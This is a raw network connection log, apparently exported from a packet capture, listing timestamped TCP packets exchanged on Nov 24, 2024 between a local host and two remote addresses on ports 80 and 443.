                                                                                                                                                                                                Nov 24, 2024 03:04:33.753829956 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.753925085 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.753983021 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.754194021 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.754264116 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:33.755028963 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.755151987 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.756222963 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.756251097 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.756320000 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.756762028 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:33.756789923 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.756792068 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.757426023 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.757548094 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.757612944 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.757682085 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:33.757705927 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.758640051 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.758747101 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.758802891 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.759823084 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.759934902 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.759998083 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.761018038 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.761131048 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.761188984 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.762218952 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.762335062 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.762386084 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.763437033 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.763541937 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.764014959 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.764625072 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.764748096 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.764796019 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.765826941 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.765932083 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.765986919 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.767034054 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.767103910 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.767946005 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.768202066 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.768325090 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.769404888 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.769449949 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.769520044 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.770617008 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.770664930 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.770706892 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.771790028 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.771842003 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.771970987 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.772197962 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.772994041 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.773114920 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.773165941 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.774214983 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.774363041 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.774411917 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.775387049 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.775520086 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.775631905 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.776566982 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.776694059 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.776743889 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.777812958 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.777884960 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.777934074 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.778963089 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.779073954 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.780077934 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.780183077 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.780241966 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.780594110 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.781361103 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.781475067 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.781538010 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.782587051 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.782717943 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.782768965 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.783761024 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.783870935 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.783919096 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.784982920 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.785041094 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.786164999 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.786218882 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.786276102 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.787343025 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.787399054 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.787425041 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.788173914 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.788537025 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.788647890 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.788698912 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.789725065 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.789825916 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.789877892 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.790906906 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.843087912 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.849543095 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.864181995 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:33.864232063 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.896770954 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.896806955 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.896862030 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.897106886 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.897262096 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.897308111 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.898281097 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.898405075 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.898457050 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.899511099 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.899547100 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.899604082 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.933780909 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.933793068 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.933847904 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.934075117 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.934192896 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.934242964 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.935283899 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.935524940 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.935568094 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.936466932 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.936563969 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.936638117 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.937654972 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.937777042 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.937827110 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.938853979 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.938945055 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.938992977 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.940046072 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.940161943 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.940263033 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.941236973 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.941373110 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.941416025 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.942439079 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.942559004 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.942610979 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.943650961 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.943806887 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.943847895 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.944849968 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.944963932 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.945247889 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.946039915 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.946060896 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.946166039 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.946166039 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.947247028 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.947320938 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.947376966 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.948436022 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.948543072 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.948745012 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.949588060 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.949711084 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.950234890 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.950774908 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:33.950803041 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.950820923 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.950917006 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.950968027 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.952001095 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.952078104 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.952142000 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.953231096 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.953356028 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.953419924 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.954454899 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.954511881 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.954566956 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.955604076 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.955733061 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.955777884 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.956804037 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.956912041 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.956969023 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.957993031 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.958115101 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.958165884 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.959175110 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.959285975 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.959347010 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.960393906 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.960535049 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.960588932 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.961576939 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.961678982 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.961723089 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.962773085 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.962891102 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.964000940 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.964051008 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.964066029 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.965177059 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.965281963 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.965328932 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.965346098 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.966365099 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.966487885 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.966536045 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.967569113 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.967680931 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.967729092 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.968828917 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.968894958 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.968955994 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.969959974 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.970068932 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.970119953 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.971158981 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.971257925 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.972104073 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.972349882 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.972469091 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.973545074 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.973604918 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.973655939 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.974752903 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.974802017 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.974896908 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.975986958 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.976035118 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.976049900 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.976135015 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.977133036 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.977250099 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.977314949 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.978327036 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.978427887 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.978487015 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.979521990 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.979631901 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.979680061 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.980706930 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.980851889 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.980900049 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.981913090 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.982031107 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.982079983 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.983113050 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.983233929 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.984169960 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.984319925 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.984426975 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.984468937 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.985588074 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.985640049 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.985690117 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.986701965 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.986804962 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.986850023 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.987899065 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.988034010 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.989113092 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.989160061 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.989237070 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.990291119 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.990355015 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.990406036 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.990453959 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.991487026 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.991697073 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:33.991748095 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:33.992645979 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.046200037 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.081653118 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.084806919 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:34.084846973 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.098254919 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.098417997 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.098475933 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.098840952 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.098948002 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.099011898 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.100091934 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.100148916 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.100224018 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.101248980 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.126303911 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.129158974 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:34.129200935 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.131321907 CET49732443192.168.2.513.107.246.63
